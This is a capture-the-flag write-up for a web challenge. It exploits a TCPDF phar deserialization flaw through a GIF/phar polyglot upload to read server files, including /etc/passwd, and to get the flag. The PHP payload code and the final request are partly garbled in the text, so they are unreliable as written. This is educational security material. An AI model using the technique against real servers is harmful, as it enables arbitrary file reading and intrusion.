Rating:
## Introduction
This challenge gives us a web app and its [source code](https://github.com/everping/ctfs/blob/master/2019/chaos_communication_camp_2019/code-6c8fe52c26dec8c08d407bef5a52598d39dbf8b3.zip). Basically, the flow of that web app is:
- Users upload an image (png, jpg, jpeg, gif) and get the uploaded url
- Users post arbitrary html content to generate a pdf, the above image url can be included in the html content
## Analysis
Firstly, I uploaded a malformed image and got an error related to `imagemagick` in the process of creating pdf file by `tcpdf` library. This made me think of the idea of [imagetragick](https://imagetragick.com/). However, I threw this thought away when I saw functions that check the format of image files through their exif. That check prevent us to create a completed payload for the imagetragick attack.
```php
if(function_exists('exif_imagetype')) { //Die exif_imagetype-Funktion erfordert die exif-Erweiterung auf dem Server
$allowed_types = array(IMAGETYPE_PNG, IMAGETYPE_JPEG, IMAGETYPE_GIF);
$detected_type = exif_imagetype($_FILES['file']['tmp_name']);
if(!in_array($detected_type, $allowed_types)) {
echo("<div class=\"container\">Only pictures allowed!</div>");
return;
}
}
```
By googling about `tcpdf` library, I found a deserialization vulnerability in its [old version](https://packetstormsecurity.com/files/152200/TCPDF-6.2.19-Deserialization-Remote-Code-Execution.html). I reviewed our source code and compared it to that exploit and realized that we have ideal factors to create a perfect attack:
- tcpdf version 6.2.13 affected by that vulnerability
- A destruct method is defined in class PDFCreator (creator.php), this method included `file_get_contents()` function that can be trigged to read arbitrary files in the server.
## Exploit
The exploit code provided in [that paper](https://packetstormsecurity.com/files/152200/TCPDF-6.2.19-Deserialization-Remote-Code-Execution.html) is very straightforward, we can use it with a little bit of modifying. Below is what I did:
### 1. Create a valid image included the payload by using the code below
```php
startBuffering();
$phar->addFromString("test.txt", "test");
# Set stub with gif prefix to bypass image checking
$phar->setStub("GIF89atmpfile = "/var/www/site/flag.php";
$phar->setMetadata($payload);
$phar->stopBuffering();
rename($phar_file, $image_file);
}
```
If you want to try it, save it as a php file (payload.php) and turn off `phar.readonly` directive in `php.ini` then execute the command `php payload.php`. You will get file `poc.gif` and use it to do next steps.
I should explain a bit about some special points in my code:
- `GIF89a` is included as the prefix of output file because I want to bypass extension checking
- We have to pass to `$payload->tmpfile` the file we want to read. I tried with `flag.php` and got failed, but `/etc/passwd` worked so I think we need an absolute path. I read `/etc/apache2/sites-enabled/000-default.conf` first to get the full path of web source code and then luckily, I found `/var/www/site/flag.php`
### 2. Upload file and get flag
- From frontend, upload the created `poc.gif` and get the uploaded url
- Create a request like below to get pdf, the flag will be included in the response
```
POST /index.php HTTP/1.1
Host: hax.allesctf.net:3333
pdfcontent=
```
- Flag is `ALLES{phar_jpeg_polyglot_madness_such_w0w}`
